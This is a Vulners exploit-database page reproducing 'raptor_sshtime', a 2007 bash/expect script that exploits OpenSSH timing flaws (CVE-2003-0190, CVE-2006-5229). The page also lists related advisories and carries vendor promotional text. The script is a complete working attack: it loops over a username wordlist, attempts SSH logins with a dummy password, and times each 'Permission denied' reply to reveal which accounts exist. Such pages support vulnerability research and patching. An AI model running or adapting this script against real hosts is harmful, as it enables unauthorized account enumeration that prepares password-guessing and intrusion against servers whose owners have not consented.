Vulners
Lucene search
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack
| Reporter | Title | Published | Views | Family All 113 |
|---|---|---|---|---|
 | Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit | 13 Feb 200700:00 | – | zdt |
 | Portable OpenSSH < 3.6.1p2 PAM Timing Side-Channel Weakness | 20 Aug 200400:00 | – | nessus |
| OpenSSH < 4.4 Multiple Vulnerabilities | 28 Sep 200600:00 | – | nessus |
| OpenSSH < 4.1.0p2 / 4.2 Timing Attack | 10 Oct 200600:00 | – | nessus |
| OpenSSH < 4.4 Multiple Vulnerabilities | 28 Sep 200600:00 | – | nessus |
| OpenSSH w/ PAM Multiple Timing Attack Weaknesses | 6 May 200300:00 | – | nessus |
| RHEL 2.1 : openssh (RHSA-2003:224) | 6 Jul 200400:00 | – | nessus |
| SunSSH < 1.1.1 / 1.3 CBC Plaintext Disclosure | 29 Aug 201100:00 | – | nessus |
| Siemens SCALANCE X-200RNA Switch Devices Observable Timing Discrepancy (CVE-2003-0190) | 13 Mar 202500:00 | – | nessus |
| Siemens SCALANCE X-200RNA Switch Devices Concurrent Execution Using Shared Resource with Improper Synchronization (CVE-2003-1562) | 13 Mar 202500:00 | – | nessus |
10
#!/bin/bash
#
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
#
# raptor_sshtime - [Open]SSH remote timing attack exploit
# Copyright (c) 2006 Marco Ivaldi <[email protected]>
#
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
# sends an error message when a user does not exist, which allows remote
# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
#
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
# and possibly under limited configurations, allows remote attackers to
# determine valid usernames via timing discrepancies in which responses take
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
# NOTE: as of 20061014, it appears that this issue is dependent on the use of
# manually-set passwords that causes delays when processing /etc/shadow due to
# an increased number of rounds (CVE-2006-5229).
#
# This is a simple shell script based on expect meant to remotely analyze
# timing differences in sshd "Permission denied" replies. Depending on OpenSSH
# version and configuration, it may lead to disclosure of valid usernames.
#
# Usage example:
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#
# Some vars
port=22
# Command line
host=$1
dict=$2
# Local functions
function head() {
echo ""
echo "raptor_sshtime - [Open]SSH remote timing attack exploit"
echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>"
echo ""
}
function foot() {
echo ""
exit 0
}
function usage() {
head
echo "[make sure the target hostkey has been approved before]"
echo ""
echo "usage : ./sshtime <target> <wordlist>"
echo "example: ./sshtime 192.168.0.1 dict.txt"
foot
}
function notfound() {
head
echo "error : expect interpreter not found!"
foot
}
# Check if expect is there
expect=`which expect 2>/dev/null`
if [ $? -ne 0 ]; then
notfound
fi
# Input control
if [ -z "$2" ]; then
usage
fi
# Perform the bruteforce attack
head
for user in `cat $dict`
do
echo -ne "$user@$host\t\t"
(time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
done
foot
# milw0rm.com [2007-02-13]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Feb 2007 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
EPSS0.56627